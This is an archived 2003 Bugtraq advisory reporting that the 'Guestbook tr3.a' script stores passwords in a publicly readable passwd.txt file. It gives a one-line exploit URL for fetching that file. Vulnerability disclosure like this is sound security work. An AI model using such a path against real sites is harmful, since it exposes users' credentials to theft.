[29421] in bugtraq
Guestbook tr3.a
daemon@ATHENA.MIT.EDU (subj)
Fri Mar 21 14:13:34 2003
Date: 21 Mar 2003 01:21:51 -0000
Message-ID: <20030321012151.9388.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: subj <r2subj3ct@dwclan.org>
To: bugtraq@securityfocus.com
Product : Guestbook tr3.a
Version : First
WebSite : http://www.planetmoon.net
Problem : Viewing passwords file
Description:
------------
In this script passwords are in passwd.txt file
In Shrot, all who want see the passwords can make it.
Exploit:
--------
http://[somehost]/[gb_dir]/files/passwd.txt